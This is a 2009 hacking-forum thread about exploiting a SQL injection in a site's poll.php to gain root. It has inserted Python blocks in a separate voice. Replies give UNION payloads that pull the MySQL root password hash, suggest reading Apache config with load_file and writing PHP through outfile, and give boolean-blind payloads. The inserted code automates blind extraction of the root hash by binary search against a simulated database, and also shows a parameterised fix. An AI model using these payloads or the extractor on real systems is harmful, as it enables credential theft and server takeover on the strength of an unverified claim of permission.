
RCE through SQL Injection?


4 replies to this topic

#1 FestarBG

FestarBG

    Will I break 10 posts?

  • Members
  • 2 posts

Posted 16 April 2009 - 04:12 PM

Hi,

A friend of mine gave me a kind of security test - he wants me to hack his box through a vulnerable web page. I win if I am able to make a folder in a writable directory called "skiddie" and eventually gain root privileges and make a folder in another directory. I found that the site is vulnerable to a SQL injection:
hxxp://*****.com/poll.php?id=1 union select null,null,"test",null--
And the website returns the word "test". Instead of "test" I tried:
database() - joomla
user() - root@localhost
@@datadir - /var/lib/mysql/
@@version - 5.0.75-1
I was also able to extract the admin username and password, but I can't crack the hash. The first thing that came to my mind was to use null,"php code" into outfile "/var/www/", but it doesn't work. It seems I don't have privileges to write in "/var/www"; I also do not know the directory where the website is - "/var/www/DIR?". Can you give me a hint how to proceed?

Thanks.

:)

Edited by FestarBG, 16 April 2009 - 04:13 PM.
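
To see concretely what the UNION query in the post above is doing, here is an added example (my own, not code from the thread or from the poll.php under test). It uses an in-memory SQLite database as a stand-in for the MySQL box, so the table name, columns and sample rows are constructed, and sqlite_version() plays the role of @@version. poll_vulnerable pastes the id parameter into the query the way poll.php evidently does; count_columns repeats the poster's trial of adding NULLs until the UNION stops erroring; union_probe reads back whatever expression is put in the echoed third column; poll_fixed is the same lookup with a bound parameter, where the payload is just a value that matches nothing.

```python
import sqlite3

# Constructed stand-in for the thread's target: an in-memory SQLite database with a
# four-column poll table, so the example runs offline. The table, columns and rows
# are made up; sqlite_version() stands in for MySQL's @@version.


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE polls (id INTEGER PRIMARY KEY, question TEXT, answer TEXT, votes INTEGER);
        INSERT INTO polls VALUES (1, 'Favourite editor?', 'vim', 42);
        INSERT INTO polls VALUES (2, 'Favourite shell?', 'zsh', 7);
    """)
    return conn


def poll_vulnerable(conn, id_param: str):
    """poll.php as the thread describes it: the id parameter is concatenated into the SQL."""
    sql = "SELECT id, question, answer, votes FROM polls WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def poll_fixed(conn, id_param: str):
    """Same lookup with a bound parameter: the payload is compared as a value, never parsed as SQL."""
    return conn.execute(
        "SELECT id, question, answer, votes FROM polls WHERE id=?", (id_param,)
    ).fetchall()


def count_columns(conn, max_cols: int = 20) -> int:
    """Find the column count the way the poster did: add NULLs until the UNION stops erroring.
    (On MySQL the error text differs, but the pass/fail behaviour is the same.)"""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["null"] * n)
        try:
            poll_vulnerable(conn, f"1 union select {nulls}--")
            return n
        except sqlite3.OperationalError:
            continue
    raise RuntimeError(f"no column count up to {max_cols} worked")


def union_probe(conn, expression: str) -> str:
    """Put an expression in the third column (the one the page echoes) and read it back."""
    rows = poll_vulnerable(conn, f"1 union select null,null,{expression},null--")
    # The real poll row comes back too; the injected row is the one with a NULL id.
    return [r[2] for r in rows if r[0] is None][0]


if __name__ == "__main__":
    db = setup_db()
    print("columns:", count_columns(db))
    print("echo test:", union_probe(db, "'test'"))
    print("version:", union_probe(db, "sqlite_version()"))
    print("same payload, bound parameter:", poll_fixed(db, "1 union select null,null,'test',null--"))
```

The payload string is identical in both lookups; the only difference is whether it is glued into the statement text or handed to the driver as a value, which is the whole fix for this class of bug.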


#2 RETN

RETN

    HACK THE PLANET!

  • Members
  • 68 posts
  • Location:Around the corner

Posted 17 April 2009 - 08:16 AM

Well, you may just want to try making it throw an error. Usually, if verbose errors are enabled, it will freak out and give you the full path.
For example:

hxxp://anysiterunningw0rdpr3s$.com/wp-settings.php

Dig around for an includes directory or something. You can almost always get it to fork an error of some sort.

EDIT: Seeing as you're root, you may want to check out the mysql.user and the INFORMATION_SCHEMA tables:

Since you're using the particular versions that you are:
http://dev.mysql.com...ion-schema.html

might even try :
hxxp://*****.com/poll.php?id=1 union select null,null,(SELECT Password FROM mysql.user WHERE host='localhost' AND user='root'),null--
hxxp://*****.com/poll.php?id=1 union select null,null,(SELECT Password FROM mysql.user WHERE user='root' LIMIT 1),null--

(SELECT Password FROM mysql.user WHERE host='localhost' AND user='root')
OR
(SELECT Password FROM mysql.user WHERE user='root' LIMIT 1)

May return a SQL 5.0 password hash, since you are running as root, after all.

Edited by RETN, 17 April 2009 - 08:28 AM.


#3 FestarBG

FestarBG

    Will I break 10 posts?

  • Members
  • 2 posts

Posted 17 April 2009 - 01:42 PM

OK, I'll search for some verbose errors.

Neither of the queries works. I tried
poll.php?id=1+union+select+null,password,null,null+from+mysql.user+where+user="root"+limit+0,1--
It works, but the hash isn't extracted.

Any other ideas? :huh:

#4 prick

prick

    SUP3R 31337

  • Members
  • 160 posts
  • Location:44

Posted 17 April 2009 - 04:53 PM

Try
poll.php?id[]=1
for kicking errors.

The MySQL might not be world-facing, and it wouldn't be that uncommon if it doesn't even have a password.

Try using load_file to locate the apache httpd.conf, find the document root, then try outfile again.

A few Apache conf locations to try

#5 RETN

RETN

    HACK THE PLANET!

  • Members
  • 68 posts
  • Location:Around the corner

Posted 17 April 2009 - 05:15 PM

You may want to try some boolean enumeration. See if the following works:

hxxp://*****.com/poll.php?id=1%20AND%201=1
hxxp://*****.com/poll.php?id=1%20AND%201=0

The first should return whatever is usually there, and I'm guessing that the second should make no "poll" display. If you get this far, you have a working true and false.

If this is the case, then,
hxxp://*****.com/poll.php?id=1%20AND%20((ASCII((MID((SELECT%20Password%20FROM%20mysql.user%20WHERE%20user='root'%20LIMIT%200,1),1,1))))>96)

Will tell you if the ASCII code of the first character of the password is greater than 96 (lowercase a or above). If this works, you'll want to break out an ASCII chart to cross-compare. You should be able to modify the above query to properly isolate the correct values. I am not 100% sure about MySQL 5.0, but I believe the hash to be stored in hexadecimal, meaning your possible ASCII codes will be 97-102 (a-f) and 48-57 (0-9). You may also want to find the length of the hash with the following comparison:
hxxp://*****.com/poll.php?id=1%20AND%20((LENGTH((SELECT%20Password%20FROM%20mysql.user%20WHERE%20user='root'%20LIMIT%200,1)))>10)

This will "return true" if the length of the hash is greater than ten.

Happy hacking. Hope this helped.

EDIT: SQL Syntax

EDIT: One more thing -- you may want to check out the grants table. This will tell you if it's A) world accessible or B) you have the privileges you want. Just a thought.

Edited by RETN, 17 April 2009 - 05:25 PM.
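
RETN's boolean enumeration, as an added worked example (mine, not code from the thread). It goes one step beyond the post: instead of comparing against an ASCII chart by hand, it binary-searches the length and then each character over the printable range, so each character costs about seven requests regardless of case. The target is simulated with an in-memory SQLite database (constructed tables and a constructed root password), so SQLite's unicode() and substr() take the place of MySQL's ASCII() and MID() in the injected condition, and LENGTH() is the same in both. The stored hash is computed in the MySQL 4.1+ PASSWORD() format, '*' followed by the 40 uppercase hex digits of SHA1(SHA1(password)). Target.ask sends one true/false probe the way the id=1 AND (...) URLs above do and reports whether the poll still displayed; the class and function names are my own.

```python
import hashlib
import sqlite3

# The database, table names and root password below are constructed for the example.
ROOT_PASSWORD = "s3cret-poll-box"   # the attacker only ever sees its hash
SUBQUERY = "SELECT password FROM user WHERE user='root' LIMIT 1"


def mysql_native_password(pw: str) -> str:
    """MySQL 4.1+ PASSWORD(): '*' followed by uppercase hex of SHA1(SHA1(pw))."""
    inner = hashlib.sha1(pw.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


class Target:
    """Stand-in for poll.php: concatenates the id parameter into the query and
    'shows a poll' only when the query returns a row."""

    def __init__(self):
        self.conn = sqlite3.connect(":memory:")
        self.conn.executescript("""
            CREATE TABLE polls (id INTEGER PRIMARY KEY, question TEXT);
            INSERT INTO polls VALUES (1, 'Favourite editor?');
            CREATE TABLE user (host TEXT, user TEXT, password TEXT);
        """)
        self.conn.execute("INSERT INTO user VALUES ('localhost', 'root', ?)",
                          (mysql_native_password(ROOT_PASSWORD),))
        self.requests = 0

    def page_shows_poll(self, id_param: str) -> bool:
        self.requests += 1
        sql = "SELECT id, question FROM polls WHERE id=" + id_param   # the injection point
        return len(self.conn.execute(sql).fetchall()) > 0

    def ask(self, condition: str) -> bool:
        """One probe: poll.php?id=1 AND (condition). True iff the poll still displays."""
        return self.page_shows_poll(f"1 AND ({condition})")


def _binary_search(ask, predicate_gt, lo: int, hi: int) -> int:
    """Smallest v in [lo, hi] for which 'secret > v' is false, i.e. the secret itself."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(predicate_gt(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_length(ask, subquery: str, max_len: int = 255) -> int:
    """LENGTH() of the subquery result, found with LENGTH((...)) > n probes."""
    return _binary_search(ask, lambda n: f"LENGTH(({subquery})) > {n}", 0, max_len)


def blind_char(ask, subquery: str, pos: int) -> str:
    """Character at 1-based position pos, via unicode(substr(...)) > n probes
    (MySQL spelling: ASCII(MID(...)) > n). Assumes printable ASCII, codes 32..126."""
    code = _binary_search(
        ask, lambda n: f"unicode(substr(({subquery}), {pos}, 1)) > {n}", 32, 126)
    return chr(code)


def extract(ask, subquery: str) -> str:
    """Recover the whole string: length first, then one character at a time."""
    n = blind_length(ask, subquery)
    return "".join(blind_char(ask, subquery, i) for i in range(1, n + 1))


if __name__ == "__main__":
    t = Target()
    print("true probe:", t.ask("1=1"), " false probe:", t.ask("1=0"))
    print("root hash:", extract(t.ask, SUBQUERY), "in", t.requests, "requests")
```

Against a real target the two calibration probes (1=1 and 1=0) are worth keeping, since a page that errors or caches can make both look "true"; and the 41-character length coming back from blind_length is itself a quick sanity check that you are reading a 4.1+ hash rather than an empty field.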





BinRev is hosted by the great people at Lunarpages!